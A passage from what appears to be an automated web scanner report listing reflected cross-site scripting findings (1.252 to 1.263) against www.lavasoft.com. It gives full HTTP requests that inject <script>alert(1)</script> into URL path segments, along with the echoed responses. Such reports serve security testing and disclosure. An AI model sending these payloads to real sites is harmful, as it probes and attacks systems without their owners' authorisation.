Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestarbb6be'><script>alert(1)</script>8d96e95fe62/css/fivestar.css'>
...[SNIP]...

1.252. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7eacf'><script>alert(1)</script>d48d4e06152 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/css7eacf'><script>alert(1)</script>d48d4e06152/fivestar.css?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/css7eacf'><script>alert(1)</script>d48d4e06152/fivestar.css'>
...[SNIP]...

1.253. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/css/fivestar.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/css/fivestar.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57d66'><script>alert(1)</script>76b8e23b5fc was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/css/fivestar.css57d66'><script>alert(1)</script>76b8e23b5fc?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18230
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/css/fivestar.css57d66'><script>alert(1)</script>76b8e23b5fc'>
...[SNIP]...

1.254. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd9'><script>alert(1)</script>e6672341f07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft67dd9'><script>alert(1)</script>e6672341f07/sites/all/modules/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:24 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10645
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft67dd9'><script>alert(1)</script>e6672341f07/sites/all/modules/fivestar/js/fivestar.js?w'>
...[SNIP]...

1.255. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45272'><script>alert(1)</script>3dbce6c32cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites45272'><script>alert(1)</script>3dbce6c32cb/all/modules/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18264
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites45272'><script>alert(1)</script>3dbce6c32cb/all/modules/fivestar/js/fivestar.js'>
...[SNIP]...

1.256. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa182'><script>alert(1)</script>389433e4b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/allfa182'><script>alert(1)</script>389433e4b7/modules/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18224
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/allfa182'><script>alert(1)</script>389433e4b7/modules/fivestar/js/fivestar.js'>
...[SNIP]...

1.257. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f8be'><script>alert(1)</script>ecb418fd4bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules6f8be'><script>alert(1)</script>ecb418fd4bc/fivestar/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules6f8be'><script>alert(1)</script>ecb418fd4bc/fivestar/js/fivestar.js'>
...[SNIP]...

1.258. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ed9e'><script>alert(1)</script>d07b7742900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar6ed9e'><script>alert(1)</script>d07b7742900/js/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar6ed9e'><script>alert(1)</script>d07b7742900/js/fivestar.js'>
...[SNIP]...

1.259. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f4e8'><script>alert(1)</script>6f14cf79154 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/js7f4e8'><script>alert(1)</script>6f14cf79154/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/js7f4e8'><script>alert(1)</script>6f14cf79154/fivestar.js'>
...[SNIP]...

1.260. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload beed3'><script>alert(1)</script>9463b547838 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/js/fivestar.jsbeed3'><script>alert(1)</script>9463b547838?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/js/fivestar.jsbeed3'><script>alert(1)</script>9463b547838'>
...[SNIP]...

1.261. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 850d2'><script>alert(1)</script>c70be2247dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft850d2'><script>alert(1)</script>c70be2247dd/sites/all/modules/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10657
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft850d2'><script>alert(1)</script>c70be2247dd/sites/all/modules/google_analytics/googleanalytics.js?w'>
...[SNIP]...

1.262. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ce65'><script>alert(1)</script>b37c89188f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites3ce65'><script>alert(1)</script>b37c89188f6/all/modules/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18288
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites3ce65'><script>alert(1)</script>b37c89188f6/all/modules/google_analytics/googleanalytics.js'>
...[SNIP]...

1.263. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee6ff'><script>alert(1)</script>31bf7d50746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

